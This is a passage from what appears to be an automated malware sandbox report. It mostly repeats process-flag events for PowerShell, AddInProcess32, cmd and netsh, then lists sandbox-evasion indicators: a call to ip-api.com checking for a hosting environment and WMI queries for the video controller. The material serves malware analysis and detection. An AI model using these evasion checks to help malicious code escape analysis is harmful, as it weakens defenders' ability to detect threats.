          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
